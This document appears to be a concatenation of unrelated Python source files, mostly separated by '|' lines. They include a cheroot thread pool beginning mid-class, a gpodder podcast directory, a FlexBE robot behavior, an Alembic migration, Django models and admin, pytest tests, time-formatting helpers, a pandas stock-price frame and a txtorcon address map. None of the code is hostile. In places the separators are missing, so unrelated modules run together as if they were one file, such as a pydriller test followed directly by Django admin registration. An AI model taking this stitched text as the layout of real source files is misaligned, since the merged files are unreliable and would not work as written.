                        self.bytes_written += self.conn.wfile.bytes_written
                        self.work_time += time.time() - self.start_time
                        self.start_time = None
                    self.conn = None
        except (KeyboardInterrupt, SystemExit) as ex:
            # Remember the interrupt so the server's main loop can act on it.
            self.server.interrupt = ex
class ThreadPool:
    """A Request Queue for an HTTPServer which pools threads.

    ThreadPool objects must provide min, get(), put(obj), start()
    and stop(timeout) attributes.
    """

    def __init__(
            self, server, min=10, max=-1, accepted_queue_size=-1,
            accepted_queue_timeout=10,
    ):
        """Initialize HTTP requests queue instance.

        Args:
            server (cheroot.server.HTTPServer): web server object
                receiving this request
            min (int): minimum number of worker threads
            max (int): maximum number of worker threads
            accepted_queue_size (int): maximum number of active
                requests in queue
            accepted_queue_timeout (int): timeout for putting request
                into queue
        """
        self.server = server
        self.min = min
        self.max = max
        self._threads = []
        self._queue = queue.Queue(maxsize=accepted_queue_size)
        self._queue_put_timeout = accepted_queue_timeout
        self.get = self._queue.get
        # One entry per shutdown request already queued; lets idle/shrink
        # account for workers that are about to exit.
        self._pending_shutdowns = collections.deque()

    def start(self):
        """Start the pool of threads."""
        for i in range(self.min):
            self._threads.append(WorkerThread(self.server))
        for worker in self._threads:
            worker.setName(
                'CP Server {worker_name!s}'.
                format(worker_name=worker.getName()),
            )
            worker.start()
        # Block until every worker has begun polling the queue.
        for worker in self._threads:
            while not worker.ready:
                time.sleep(.1)

    @property
    def idle(self):  # noqa: D401; irrelevant for properties
        """Number of worker threads which are idle. Read-only."""
        idles = len([t for t in self._threads if t.conn is None])
        return max(idles - len(self._pending_shutdowns), 0)

    def put(self, obj):
        """Put request into queue.

        Args:
            obj (:py:class:`~cheroot.server.HTTPConnection`): HTTP connection
                waiting to be processed
        """
        self._queue.put(obj, block=True, timeout=self._queue_put_timeout)

    def _clear_dead_threads(self):
        # Remove any dead threads from our list
        for t in [t for t in self._threads if not t.is_alive()]:
            self._threads.remove(t)
            try:
                self._pending_shutdowns.popleft()
            except IndexError:
                pass

    def grow(self, amount):
        """Spawn new worker threads (not above self.max)."""
        if self.max > 0:
            budget = max(self.max - len(self._threads), 0)
        else:
            # self.max <= 0 indicates no maximum
            budget = float('inf')
        n_new = min(amount, budget)

        workers = [self._spawn_worker() for i in range(n_new)]
        # Wait for them all to come online before registering them.
        while not all(worker.ready for worker in workers):
            time.sleep(.1)
        self._threads.extend(workers)

    def _spawn_worker(self):
        # Create, name, and start one worker thread.
        worker = WorkerThread(self.server)
        worker.setName(
            'CP Server {worker_name!s}'.
            format(worker_name=worker.getName()),
        )
        worker.start()
        return worker

    def shrink(self, amount):
        """Kill off worker threads (not below self.min)."""
        # Grow/shrink the pool if necessary.
        # Remove any dead threads from our list
        amount -= len(self._pending_shutdowns)
        self._clear_dead_threads()
        if amount <= 0:
            return

        # calculate the number of threads above the minimum
        n_extra = max(len(self._threads) - self.min, 0)
        # don't remove more than amount
        n_to_remove = min(amount, n_extra)

        # put shutdown requests on the queue equal to the number of threads
        # to remove. As each request is processed by a worker, that worker
        # will terminate and be culled from the list.
        for n in range(n_to_remove):
            self._pending_shutdowns.append(None)
            self._queue.put(_SHUTDOWNREQUEST)

    def stop(self, timeout=5):
        """Terminate all worker threads.

        Args:
            timeout (int): time to wait for threads to stop gracefully
        """
        # for compatibility, negative timeouts are treated like None
        # TODO: treat negative timeouts like already expired timeouts
        if timeout is not None and timeout < 0:
            timeout = None
            # BUG FIX: the warnings module has no `warning` attribute;
            # the original `warnings.warning(...)` raised AttributeError
            # whenever a negative timeout was passed.
            warnings.warn(
                'In the future, negative timeouts to Server.stop() '
                'will be equivalent to a timeout of zero.',
                stacklevel=2,
            )

        if timeout is not None:
            endtime = time.time() + timeout

        # Must shut down threads here so the code that calls
        # this method can know when all threads are stopped.
        for worker in self._threads:
            self._queue.put(_SHUTDOWNREQUEST)

        ignored_errors = (
            # TODO: explain this exception.
            AssertionError,
            # Ignore repeated Ctrl-C. See cherrypy#691.
            KeyboardInterrupt,
        )

        for worker in self._clear_threads():
            remaining_time = timeout and endtime - time.time()
            try:
                worker.join(remaining_time)
                if worker.is_alive():
                    # Timeout exhausted; forcibly shut down the socket.
                    self._force_close(worker.conn)
                    worker.join()
            except ignored_errors:
                pass

    @staticmethod
    @pass_none
    def _force_close(conn):
        if conn.rfile.closed:
            return
        try:
            try:
                conn.socket.shutdown(socket.SHUT_RD)
            except TypeError:
                # pyOpenSSL sockets don't take an arg
                conn.socket.shutdown()
        except OSError:
            # shutdown sometimes fails (race with 'closed' check?)
            # ref #238
            pass

    def _clear_threads(self):
        """Clear self._threads and yield all joinable threads."""
        # threads = pop_all(self._threads)
        threads, self._threads[:] = self._threads[:], []
        return (
            thread
            for thread in threads
            if thread is not threading.currentThread()
        )

    @property
    def qsize(self):
        """Return the queue size."""
        return self._queue.qsize()
|
from __future__ import unicode_literals
import logging
import requests
import string
import urllib2
import urlparse
from mopidy_podcast.directory import PodcastDirectory
from mopidy_podcast.models import Ref
from . import Extension
_TAG_PATH = '/api/2/tag/{tag}/{count}.json'
_TAGS_PATH = '/api/2/tags/{count}.json'
_SEARCH_PATH = '/search.json'
logger = logging.getLogger(__name__)
class Formatter(string.Formatter):
    """Formatter that maps unknown replacement fields to ``None``
    instead of raising ``KeyError``."""

    def get_value(self, key, args, kwargs):
        try:
            return string.Formatter.get_value(self, key, args, kwargs)
        except KeyError:
            return None
formatter = Formatter()
class GPodderDirectory(PodcastDirectory):
    """Podcast directory provider backed by the gpodder.net web API."""

    name = 'gpodder'

    def __init__(self, config):
        super(GPodderDirectory, self).__init__(config)
        self._config = config[Extension.ext_name]
        self._session = requests.Session()  # reuse one HTTP connection pool
        base_url = self._config['base_url']
        self._tag_url = urlparse.urljoin(base_url, _TAG_PATH)
        self._tags_url = urlparse.urljoin(base_url, _TAGS_PATH)
        self._search_url = urlparse.urljoin(base_url, _SEARCH_PATH)
        self.root_name = self._config['root_name']  # for browsing

    def browse(self, uri, limit=None):
        # Root lists the available tags; any other uri lists the podcasts
        # carrying that tag.
        if not uri or uri == '/':
            return self._tags(self._tags_url, limit)
        else:
            return self._podcasts(self._tag_url, limit, tag=uri.strip('/'))

    def search(self, uri, terms, attr=None, type=None, limit=None):
        # Only a global, untyped podcast search is supported by the API.
        if uri and uri != '/':
            return None  # no tag-related searches in gpodder.net
        if attr is not None:
            return None  # no attribute searches in gpodder.net
        if type not in (None, Ref.PODCAST):
            return None  # no searching for episodes in gpodder.net
        return self._podcasts(self._search_url, query=terms, limit=limit)

    def _tags(self, url, limit=None, **kwargs):
        # Build directory refs for each tag returned by the API.
        refs = []
        count = limit or self._config['count']
        format = self._config['tag_format']
        for item in self._request(url, limit=limit, count=count, **kwargs):
            uri = urllib2.quote(item['tag'].encode('utf-8'))
            name = formatter.vformat(format, [], item)
            refs.append(Ref.directory(uri=uri, name=name))
        return refs

    def _podcasts(self, url, limit=None, **kwargs):
        # Build podcast refs, dropping any URL fragment from the feed URL.
        refs = []
        count = limit or self._config['count']
        format = self._config['podcast_format']
        for item in self._request(url, limit=limit, count=count, **kwargs):
            uri, _ = urlparse.urldefrag(item['url'])
            name = formatter.vformat(format, [], item)
            refs.append(Ref.podcast(uri=uri, name=name))
        return refs

    def _request(self, url, query=None, limit=None, **kwargs):
        # GET the formatted endpoint and slice the JSON list to `limit`
        # (a None limit returns everything).
        response = self._session.get(
            url.format(**kwargs),
            params={'q': query},
            timeout=self._config['timeout']
        )
        response.raise_for_status()
        logger.debug('Retrieving %s took %s', response.url, response.elapsed)
        return response.json()[:limit]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sonia_flexbe_behaviors.gate_task_sm import gate_taskSM
from sonia_flexbe_behaviors.jiangshi_task_sm import jiangshi_taskSM
from sonia_flexbe_behaviors.path_task_sm import path_taskSM
from sonia_flexbe_behaviors.vision_droppers_sm import vision_droppersSM
from sonia_flexbe_states.set_control_mode import set_control_mode
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Wed Nov 17 2021
@author: William FA
'''
class CompetitionrunASM(Behavior):
    '''
    Gate trickshot task
    Path task
    Jiangshi task
    Path task
    Dropper task
    '''

    def __init__(self):
        super(CompetitionrunASM, self).__init__()
        self.name = 'Competition run A'

        # parameters of this behavior

        # references to used behaviors
        self.add_behavior(gate_taskSM, 'gate_task')
        self.add_behavior(jiangshi_taskSM, 'jiangshi_task')
        self.add_behavior(path_taskSM, 'path_task')
        self.add_behavior(path_taskSM, 'path_task_2')
        self.add_behavior(vision_droppersSM, 'vision_droppers')

        # Additional initialization code can be added inside the following tags
        # [MANUAL_INIT]
        # [/MANUAL_INIT]

        # Behavior comments:

    def create(self):
        # x:893 y:586, x:41 y:477
        _state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])

        # Additional creation code can be added inside the following tags
        # [MANUAL_CREATE]
        # [/MANUAL_CREATE]

        # Sequence: gate -> path -> jiangshi -> path_2 -> droppers; every
        # failure path routes through 'stop control 2' to the 'failed' outcome.
        with _state_machine:
            # x:90 y:47
            OperatableStateMachine.add('gate_task',
                                       self.use_behavior(gate_taskSM, 'gate_task'),
                                       transitions={'finished': 'path_task', 'failed': 'stop control 2'},
                                       autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})

            # x:445 y:198
            OperatableStateMachine.add('jiangshi_task',
                                       self.use_behavior(jiangshi_taskSM, 'jiangshi_task'),
                                       transitions={'finished': 'path_task_2', 'failed': 'stop control 2'},
                                       autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})

            # x:360 y:63
            OperatableStateMachine.add('path_task',
                                       self.use_behavior(path_taskSM, 'path_task'),
                                       transitions={'finished': 'jiangshi_task', 'failed': 'stop control 2', 'lost_target': 'stop control 2'},
                                       autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit, 'lost_target': Autonomy.Inherit})

            # x:462 y:328
            OperatableStateMachine.add('path_task_2',
                                       self.use_behavior(path_taskSM, 'path_task_2'),
                                       transitions={'finished': 'vision_droppers', 'failed': 'stop control 2', 'lost_target': 'stop control 2'},
                                       autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit, 'lost_target': Autonomy.Inherit})

            # x:627 y:571
            OperatableStateMachine.add('stop control 1',
                                       set_control_mode(mode=0, timeout=3),
                                       transitions={'continue': 'finished', 'failed': 'finished'},
                                       autonomy={'continue': Autonomy.Off, 'failed': Autonomy.Off})

            # x:159 y:325
            OperatableStateMachine.add('stop control 2',
                                       set_control_mode(mode=0, timeout=3),
                                       transitions={'continue': 'failed', 'failed': 'failed'},
                                       autonomy={'continue': Autonomy.Off, 'failed': Autonomy.Off})

            # x:472 y:455
            OperatableStateMachine.add('vision_droppers',
                                       self.use_behavior(vision_droppersSM, 'vision_droppers'),
                                       transitions={'finished': 'stop control 1', 'failed': 'stop control 2', 'lost_target': 'stop control 2'},
                                       autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit, 'lost_target': Autonomy.Inherit})

        return _state_machine

    # Private functions can be added inside the following tags
    # [MANUAL_FUNC]
    # [/MANUAL_FUNC]
|
import luz
import torch
luz.set_seed(123)
def get_dataset(size):
    """Build a dataset of `size` copies of one fixed (x, y) sample."""
    features = torch.rand(10)
    target = torch.tensor([0.0, 0.0, 0.0, 1.0, 0.0])
    sample = luz.Data(x=features, y=target)
    return luz.Dataset([sample] * size)
class Net(luz.Model):
    # Minimal model: a single 10 -> 5 linear layer.
    def __init__(self):
        super().__init__()
        self.lin = torch.nn.Linear(10, 5)

    def forward(self, x):
        # Raw linear outputs; no activation applied.
        return self.lin(x)
class Learner(luz.Learner):
    # Wires together model, loss, optimizer, and tuning configuration.

    def model(self):
        return Net()

    def criterion(self):
        return torch.nn.MSELoss()

    def optimizer(self, model):
        return torch.optim.Adam(model.parameters())

    def hyperparams(self, tuner):
        # Only the batch size is tuned, sampled from [1, 20].
        return dict(batch_size=tuner.sample(1, 20))

    def fit_params(self):
        return dict(
            stop_epoch=10,
            early_stopping=True,
        )

    def loader(self, dataset):
        return dataset.loader(batch_size=self.hparams.batch_size)

    def scorer(self):
        # NOTE(review): assumes Holdout(0.25, 0.3) splits off validation and
        # test fractions -- confirm against luz's documentation.
        return luz.Holdout(0.25, 0.3)

    def tuner(self):
        # Evaluate 7 random hyperparameter samples.
        return luz.RandomSearch(7)
# Tune the batch size over the synthetic dataset on the CPU and print
# the resulting score.
learner = Learner()
d = get_dataset(1000)
print(learner.tune(d, "cpu"))
|
#!/usr/bin/env python
from __future__ import print_function
import os,sys,argparse,logging,time
import getpass
def _str2bool(value):
    """Interpret a CLI string as a boolean.

    argparse's `type=bool` treats every non-empty string (including
    "False") as True; this converter handles the usual spellings.
    """
    return str(value).strip().lower() not in ('', 'false', 'f', 'no', 'n', '0')


parser = argparse.ArgumentParser()
parser.add_argument("brokeraddr",type=str,help="Broker Address")
parser.add_argument("-l","--logfile",type=str, default=None,
                    help="where the log file is writen to")
parser.add_argument("-d","--debug",action="store_true",
                    help="set logger level to debug")
parser.add_argument("-i","--input",type=str,default=None,
                    help="input file to run over")
parser.add_argument("-o","--output",type=str,default=None,
                    help="output file name")
parser.add_argument("-a","--adc",type=str,default="wire",
                    help="adc producer from input")
parser.add_argument("-n","--out_tree_name",type=str,default="mrcnn",
                    help="output tree name")
# BUG FIX: `type=bool` made any supplied value (even "False") truthy.
parser.add_argument("-t","--tick",type=_str2bool,default=True,
                    help="specifies whether tick backwards")
parser.add_argument("--local",action="store_true",default=False,
                    help="runs a local job with a broker and worker on an inter process socket (ipc)")
parser.add_argument("--weights-dir",type=str,default="None",
                    help="specify path to directory with weights (assumes weight names)")
if __name__ == "__main__":
    args = parser.parse_args(sys.argv[1:])

    from UBMRCNNClient import UBMRCNNClient

    endpoint = args.brokeraddr
    # BUG FIX: `level` was initialized to DEBUG, which made the -d/--debug
    # flag a no-op; default to INFO and raise verbosity only on request.
    level = logging.INFO
    if args.debug:
        level = logging.DEBUG
    if args.logfile is not None:
        logging.basicConfig(filename=args.logfile,level=level)

    log = logging.getLogger("start_ublarcvsever_worker_main")
    # no-op if the call above already configured the root logger
    logging.basicConfig(level=level)

    workers_v = None
    broker = None
    if args.local:
        from ublarcvserver.start_broker import start_broker
        from start_ubmrcnn_worker import startup_ubmrcnn_workers
        if len(endpoint)<5 or endpoint[:6]!="ipc://":
            raise ValueError("Broker address must be an IPC socker. Addresses look like: 'ipc:///tmp/feeds/mysocketname'. Got: {}".format(endpoint))

        # start a broker daemon
        broker = start_broker(endpoint)

        # weight files, one per wire plane
        weights_files = {0:args.weights_dir+"/mcc8_mrcnn_plane0.pth",
                         1:args.weights_dir+"/mcc8_mrcnn_plane1.pth",
                         2:args.weights_dir+"/mcc8_mrcnn_plane2.pth"}
        workers_v = startup_ubmrcnn_workers(endpoint,
                                            weights_files,
                                            nplanes=[0,1,2],
                                            device_id="cpu",
                                            batch_size=1)

    client = UBMRCNNClient(args.brokeraddr,args.input,args.output,
                           adc_producer=args.adc, tick_backwards=args.tick, mrcnn_tree_name=args.out_tree_name)
    client.connect()
    client.process_entries()
    print("processed")
    client.finalize()
|
# -*- coding=utf-8 -*-
"""{{cookiecutter.project_name}} core module."""
def get_emojis():
    """Return a dict of emojis."""
    return {"snek": "🐍", "rabit": "🐰", "monky": "🐒"}
|
"""empty message
Revision ID: 444d4749dfa1
Revises: 16f0ba32110a
Create Date: 2021-10-14 06:23:17.102819
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '444d4749dfa1'
down_revision = '16f0ba32110a'
branch_labels = None
depends_on = None
def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # docker: add a free-form text column, the last image name, and a GPU flag
    op.add_column('docker', sa.Column('expand', sa.Text(length=65536), nullable=True))
    op.add_column('docker', sa.Column('last_image', sa.String(length=200), nullable=True))
    op.add_column('docker', sa.Column('need_gpu', sa.Boolean(), nullable=True))
    # pipeline: mandatory expiry limit; service: free-form text column
    op.add_column('pipeline', sa.Column('expired_limit', sa.Integer(), nullable=False))
    op.add_column('service', sa.Column('expand', sa.Text(length=65536), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Reverse of upgrade(): drop every column added by this revision.
    op.drop_column('service', 'expand')
    op.drop_column('pipeline', 'expired_limit')
    op.drop_column('docker', 'need_gpu')
    op.drop_column('docker', 'last_image')
    op.drop_column('docker', 'expand')
    # ### end Alembic commands ###
|
import pytest
from pytest_djangoapp.configuration import Configuration
def test_configration(pytestconfig):
    # Exercise Configuration.get_combined() both with and without an explicit
    # app name, then check that app-name deduction fails far from the project.
    # NOTE(review): function name has a typo ("configration"); renaming would
    # change the collected test id, so it is left as-is.
    settings = Configuration.get()

    settings[Configuration._KEY_APP] = 'some'
    assert Configuration.get_combined(pytestconfig)

    settings[Configuration._KEY_APP] = ''
    assert Configuration.get_combined(pytestconfig)

    def swap_dir(level):
        # Temporarily point the invocation dir `level` path components up,
        # restoring the original directory afterwards.
        old_dir = pytestconfig.invocation_dir
        try:
            pytestconfig.invocation_dir = old_dir.parts()[level]
            assert Configuration.get_combined(pytestconfig)
        finally:
            pytestconfig.invocation_dir = old_dir

    with pytest.raises(Exception):
        # Unable to deduce app name.
        swap_dir(-4)
def test_settings_hook():
    # Verify that the settings hook injected the HOOKED flag into settings.
    from django.conf import settings
    assert settings.HOOKED
|
from pydriller.domain.developer import Developer
def test_eq_dev():
    # Developer equality appears to be by (name, email): identical pairs are
    # equal, a different email is not, and comparing with None is safe.
    d1 = Developer("Davide", "s.d@gmail.com")
    d2 = Developer("Davide", "s.d@gmail.com")
    d3 = Developer("Davide", "s.d@gmail.eu")
    d4 = None
    assert d1 == d1
    assert d1 == d2
    assert d1 != d3
    assert d1 != d4
from django.contrib import admin
from requestHandler.models import User, Song, SystemSetting
# Expose the request-handler models in the Django admin site.
admin.site.register(User)
admin.site.register(Song)
admin.site.register(SystemSetting)
|
import redis
from settings import REDIS_URL
from rq import Worker, Queue, Connection
# Queue names this worker consumes.
listen = ['default']

# Single shared Redis connection for the worker.
conn = redis.from_url(REDIS_URL)

if __name__ == '__main__':
    with Connection(conn):
        worker = Worker(list(map(Queue, listen)))
        worker.work()  # blocks, processing jobs until terminated
from uio import * |
"""
This problem was asked by Amazon.
Given a pivot x, and a list lst, partition the list into three parts.
The first part contains all elements in lst that are less than x
The second part contains all elements in lst that are equal to x
The third part contains all elements in lst that are larger than x
Ordering within a part can be arbitrary.
For example, given x = 10 and lst = [9, 12, 3, 5, 14, 10, 10], one partition may be [9, 3, 5, 10, 10, 12, 14].
"""
def order_into_three(arr, pivot):
    """Partition *arr* into [< pivot] + [== pivot] + [> pivot].

    Ordering within each part follows the input order. Runs in O(n),
    replacing the original O(n^2) ``list.insert`` index bookkeeping,
    and produces the same ordering for the same input.

    :param arr: iterable of items comparable with *pivot*
    :param pivot: the partition value
    :return: a new list with the three parts concatenated
    """
    lesser, equal, greater = [], [], []
    for num in arr:
        if num < pivot:
            lesser.append(num)
        elif num > pivot:
            greater.append(num)
        else:
            equal.append(num)
    return lesser + equal + greater


if __name__ == '__main__':
    print(order_into_three([9, 12, 3, 5, 14, 10, 10], 10))
|
def get_hour(epoch_seconds):
    """Return the hour-of-day (0-23) component of an epoch timestamp.

    BUG FIX: the original returned total elapsed hours with no wrap,
    which is inconsistent with get_minutes/get_seconds (both wrap at 60)
    and yields an invalid clock hour after the first day.
    """
    return (epoch_seconds // 3600) % 24
def get_minutes(epoch_seconds):
    """Return the minutes-of-hour (0-59) component of an epoch timestamp."""
    total_minutes = epoch_seconds // 60
    return total_minutes % 60
def get_seconds(epoch_seconds):
    """Return the seconds-of-minute (0-59) component of an epoch timestamp."""
    whole_minutes = epoch_seconds // 60
    return epoch_seconds - whole_minutes * 60
def time_from_utc(utc_offset, utc_zero):
    """Return the local value: the UTC base shifted by the given offset."""
    shifted = utc_offset + utc_zero
    return shifted
def get_time(hour, minutes, seconds, time_type, meridiem='AM'):
    """Format a time as 'HH:MM:SS' (24h) or 'HH:MM:SS AM/PM' (12h).

    Returns a descriptive error string when any component is out of range.

    :param hour: 0-23 for time_type 24, 1-12 for time_type 12
    :param minutes: 0-59
    :param seconds: 0-59
    :param time_type: 12 or 24
    :param meridiem: 'AM' or 'PM'; only used when time_type is 12
    """
    if minutes < 0 or minutes > 59:
        return 'Invalid minutes(range 0-59)'
    if seconds < 0 or seconds > 59:
        return 'Invalid seconds(range 0-59)'
    if time_type == 24:
        if hour < 0 or hour > 23:
            return 'Invalid hours(range 0-23)'
    elif time_type == 12:
        # BUG FIX: hour 0 was accepted even though the 12-hour clock
        # (and the error message below) allow only 1-12.
        if hour < 1 or hour > 12:
            return 'Invalid hours(range 1-12)'
    else:
        return 'Invalid time_type(12 or 24 only)'
    # zero-pad each component to two digits
    if hour < 10:
        hour = "0" + str(hour)
    if minutes < 10:
        minutes = "0" + str(minutes)
    if seconds < 10:
        seconds = "0" + str(seconds)
    time = str(hour) + ":" + str(minutes) + ":" + str(seconds)
    if time_type == 12:
        time = time + " " + meridiem
    return time
|
import os
from typing import List
import numpy as np
import pandas as pd
from pandas.core.groupby import DataFrameGroupBy
from ..indicators import AbstractIndicator
from ..domain import StockPrice, Portfolio
from ..converters import utils
class StockFrame():
    """DataFrame wrapper holding price history plus computed indicator
    columns, optionally persisted to a CSV cache."""

    def __init__(self, **kwargs) -> None:
        self.df: pd.DataFrame = None
        self.cache_path = None
        if 'cache_path' in kwargs:
            self.cache_path = kwargs['cache_path']
            if os.path.exists(self.cache_path):
                ## use cache if available
                # parse price columns as Decimal to avoid float drift
                converters = {
                    'open': utils.decimal_from_value,
                    'close': utils.decimal_from_value,
                    'high': utils.decimal_from_value,
                    'low': utils.decimal_from_value,
                }
                self.df: pd.DataFrame = pd.read_csv(self.cache_path, converters=converters)
                self.df.datetime = pd.to_datetime(self.df.datetime)
                self.df.volume = self.df.volume.astype(int)
                self.df = self.df.set_index(keys=StockPrice.index_columns())
        if self.df is None:
            # no usable cache: build the frame from the supplied price objects
            if 'prices' in kwargs.keys():
                self.df = pd.DataFrame(data=[ price.to_obj() for price in kwargs['prices'] ]).set_index(keys=StockPrice.index_columns())
        self.indicators: List[AbstractIndicator] = kwargs['indicators']
        # distinct symbols present in the first level of the index
        self.symbols = np.unique(
            list(map(lambda index: index[0], self.df.index))
        )
        self._refresh_indicators()

    @property
    def symbol_groups(self) -> DataFrameGroupBy:
        # Rows grouped per symbol, sorted, for per-symbol computations.
        return self.df.groupby(by='symbol', as_index=False, sort=True)

    def add_rows(self, prices: List[StockPrice], active_portfolio: Portfolio, **kwargs) -> None:
        # Upsert each price row at its index, then recompute indicators.
        columns = StockPrice.feature_columns()
        for price in prices:
            self.df.loc[price.index, columns] = price.to_list()
        self._refresh_indicators(active_portfolio=active_portfolio, **kwargs)

    def _refresh_indicators(self, **kwargs) -> None:
        # Run every indicator per symbol, rebuilding the combined frame after
        # each indicator pass, then persist to the cache.
        self.df.sort_index(inplace=True)
        for indicator in self.indicators:
            calc = []
            for symbol in self.symbols:
                df_updated = indicator.compute(
                    self.df.loc[symbol].copy(),
                    **kwargs
                ).reset_index()
                df_updated['symbol'] = symbol
                calc.append(df_updated)
            ## recreate df,
            self.df = pd.concat(calc).set_index(keys=StockPrice.index_columns()).sort_index()
        self._cache()

    def _cache(self):
        # Persist to CSV only when a cache path was configured.
        if self.cache_path is None:
            return
        self.df.to_csv(self.cache_path)
|
from django.conf import settings
from django.contrib.postgres.fields import JSONField
from django.db import models
from mptt.fields import TreeForeignKey
from mptt.models import MPTTModel
from publications.models import Platform
class Organization(MPTTModel):
    # An organization in a tree hierarchy (django-mptt), linked to users and
    # platforms through explicit through-models.

    ext_id = models.PositiveIntegerField(
        unique=True, help_text='object ID taken from EMRS', null=True, default=None
    )
    parent = TreeForeignKey(
        'self', on_delete=models.CASCADE, null=True, blank=True, related_name='children'
    )
    ico = models.PositiveIntegerField(
        help_text='Business registration number', null=True, blank=True
    )
    internal_id = models.CharField(
        max_length=50, unique=True, null=True, help_text='special ID used for internal purposes'
    )
    name = models.CharField(max_length=250)
    short_name = models.CharField(max_length=100)
    url = models.URLField(blank=True)
    fte = models.PositiveIntegerField(
        help_text='Last available FTE number for organization', default=0
    )
    address = JSONField(default=dict)
    source = models.ForeignKey(
        'core.DataSource',
        on_delete=models.CASCADE,
        null=True,
        blank=True,
        related_name='defined_organizations',
    )
    users = models.ManyToManyField(
        settings.AUTH_USER_MODEL, through='UserOrganization', related_name='organizations'
    )
    platforms = models.ManyToManyField('publications.Platform', through='logs.OrganizationPlatform')
    created = models.DateTimeField(auto_now_add=True)
    last_modified = models.DateTimeField(auto_now=True)

    class Meta:
        ordering = ('name',)
        # `level` is the MPTT tree depth, so the same ico may only repeat
        # at different depths.
        unique_together = (('ico', 'level'),)  # duplicated ico can only be between parent and child

    def __str__(self):
        return self.name
class UserOrganization(models.Model):
    # Through-model for Organization.users; records admin rights and the
    # data source that created the link.
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    organization = models.ForeignKey(Organization, on_delete=models.CASCADE)
    is_admin = models.BooleanField(default=False)
    source = models.ForeignKey('core.DataSource', on_delete=models.CASCADE, null=True, blank=True)
    created = models.DateTimeField(auto_now_add=True)
    last_modified = models.DateTimeField(auto_now=True)

    def __str__(self):
        return f'{self.organization} / {self.user}'
|
# Dylan Connors
import re
def get_planet_names(content: str) -> list:
    """Extract every ``"BodyName"`` value from *content*.

    Args:
        content: Raw text (e.g. journal/JSON lines) to scan.

    Returns:
        A list of the captured body names in order of appearance;
        empty when none are found.
    """
    # Raw string avoids escaping surprises; the non-greedy group stops at
    # the closing quote of each value.
    pattern = re.compile(r'"BodyName":"(.+?)"')
    # findall() already returns a list of the captured groups, so the
    # original element-by-element copy loop was redundant.  (The original
    # annotation claimed `-> str`, but a list has always been returned.)
    return pattern.findall(content)
|
#!/usr/bin/env python3
# This script is used to run the cluster pool reservation system
import sys
import traceback
from clusterpool.main import main
if __name__ == '__main__':
    # Run the cluster pool reservation CLI and propagate main()'s return
    # value as the process exit status.
    exit_status = main()
    sys.exit(exit_status)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import with_statement
from txtorcon.interface import IAddrListener
from txtorcon.util import maybe_ip_addr
from twisted.internet.interfaces import IReactorTime
from twisted.internet import reactor
import datetime
import shlex
class Addr(object):
    """
    One address mapping (e.g. example.com -> 127.0.0.1) with automatic
    expiry scheduled on the owning AddrMap's reactor.
    """

    def __init__(self, map):
        """
        map is an AddrMap instance, used for scheduling expiries and
        updating the map.
        """
        self.map = map
        self.ip = None        # IPV4Address instance (or plain string)
        self.name = None      # hostname, e.g. "www.example.com"
        self.expiry = None    # IDelayedCall for the pending expiry, if any
        self.expires = None   # datetime at which the mapping lapses (None = never)
        self.created = None   # datetime of the most recent update()

    def update(self, *args):
        """
        Deals with an update from Tor; see parsing logic in torcontroller.

        args is (name, ip, expires, ...); an optional 'expires=<GMT time>'
        token, or a fourth positional token, carries the GMT expiry.
        """
        gmtexpires = None
        (name, ip, expires) = args[:3]

        for arg in args:
            if arg.lower().startswith('expires='):
                gmtexpires = arg[8:]

        if gmtexpires is None:
            if len(args) == 3:
                gmtexpires = expires
            else:
                if args[2] == 'NEVER':
                    gmtexpires = args[2]
                else:
                    gmtexpires = args[3]

        self.name = name  # "www.example.com"
        self.ip = maybe_ip_addr(ip)  # IPV4Address instance, or string

        if self.ip == '<error>':
            self._expire()
            return

        fmt = "%Y-%m-%d %H:%M:%S"

        # if we already have expiry times, etc then we want to
        # properly delay our timeout
        oldexpires = self.expires

        if gmtexpires.upper() == 'NEVER':
            # FIXME can I just select a date 100 years in the future instead?
            self.expires = None
        else:
            self.expires = datetime.datetime.strptime(gmtexpires, fmt)
        self.created = datetime.datetime.utcnow()

        if self.expires is not None:
            if oldexpires is None:
                if self.expires <= self.created:
                    diff = datetime.timedelta(seconds=0)
                else:
                    diff = self.expires - self.created
                # BUG FIX: use total_seconds(), not .seconds — the latter is
                # only the sub-day component, so an expiry more than one day
                # away was scheduled up to whole days too early.
                self.expiry = self.map.scheduler.callLater(
                    diff.total_seconds(), self._expire)
            else:
                diff = self.expires - oldexpires
                # BUG FIX: same total_seconds() fix for re-scheduled expiries.
                self.expiry.delay(diff.total_seconds())

    def _expire(self):
        """
        Callback done via callLater: drop this entry from the owning map
        and tell listeners the mapping expired.
        """
        del self.map.addr[self.name]
        self.map.notify("addrmap_expired", *[self.name], **{})
class AddrMap(object):
    """
    Tracks Addr objects (domain/IP mappings reported by Tor), keyed by
    both name and address, expiring entries automatically.

    FIXME: need listener interface, so far:
        addrmap_added(Addr)
        addrmap_expired(name)
    """

    def __init__(self):
        self.addr = {}
        self.scheduler = IReactorTime(reactor)
        self.listeners = []

    def update(self, update):
        """
        Deal with an update line from Tor: refresh the existing Addr for
        this name, or create and register a brand-new one.
        """
        tokens = shlex.split(update)
        key = tokens[0]
        try:
            existing = self.addr[key]
        except KeyError:
            entry = Addr(self)
            # register under both the name and the IP address
            self.addr[key] = entry
            self.addr[tokens[1]] = entry
            entry.update(*tokens)
            self.notify("addrmap_added", entry)
        else:
            existing.update(*tokens)

    def find(self, name_or_ip):
        """
        Return the Addr stored under *name_or_ip* (KeyError when absent).

        FIXME should make this class a dict-like (or subclass?)
        """
        return self.addr[name_or_ip]

